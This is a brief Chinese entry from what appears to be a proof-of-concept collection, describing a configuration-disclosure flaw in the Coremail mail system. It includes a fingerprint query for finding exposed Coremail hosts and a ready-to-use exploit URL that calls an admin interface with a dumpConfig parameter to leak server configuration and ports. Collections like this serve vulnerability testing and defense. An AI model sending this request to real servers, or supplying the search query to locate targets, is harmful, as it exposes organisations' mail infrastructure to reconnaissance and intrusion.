Awesome-POC/Web应用漏洞/Coremail 配置信息泄露漏洞.md
2023-08-28 15:55:36 +08:00

400 B

Coremail 配置信息泄露漏洞

漏洞描述

Coremail 某个接口存在配置信息泄露漏洞,其中存在端口,配置信息等

漏洞影响

Coremail 配置信息泄露漏洞

网络测绘

app="Coremail邮件系统"

漏洞复现

POC为

http://xxx.xxx.xxx.xxx/mailsms/s?func=ADMIN:appState&dumpConfig=/